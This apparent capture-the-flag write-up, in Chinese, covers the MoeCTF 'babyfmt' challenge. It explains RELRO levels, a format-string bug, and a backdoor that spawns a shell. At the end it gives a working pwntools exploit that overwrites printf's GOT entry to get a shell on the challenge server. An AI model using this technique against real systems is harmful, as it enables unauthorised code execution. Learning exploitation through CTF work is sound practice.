拿到程序,先checksec一下
发现是Partial RELRO,got表可修改
当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
然后看主函数
主函数这边逻辑还是比较简单的,while循环前面的代码可以不用理,直接看while循环里面的代码,read函数明显存在栈溢出漏洞,并且下一个printf存在格式化字符串漏洞,同时看左边函数列表,给出了backdoor函数,点进去,看一下
int backdoor()
{
return system("/bin/sh");
}
可见,backdoor函数可以getshell
现在这道题思路可以是修改printf函数的got表里面的内容,修改成backdoor函数地址,然后while循环下一次执行printf函数时,程序就会去执行backdoor函数,实现getshell
这道题可以利用pwntools的fmtstr_payload函数,第一个参数为数据距离格式化字符串的偏移,第二个参数为字典{pirntf_got:addr},攻击载荷pwntools已经为我们填好,可以直接使用
exp:
from pwn import * context(os='linux',arch='i386',log_level='debug') io=remote("node5.anna.nssctf.cn",28247) elf=ELF("./pwn") printf_got=elf.got['printf'] shell=elf.symbols["backdoor"] payload=fmtstr_payload(11,{printf_got:shell}) io.sendline(payload) io.interactive()标签:babyfmt,函数,--,RELRO,backdoor,printf,MoeCTF,got,array From: https://www.cnblogs.com/GGbomb/p/17794148.html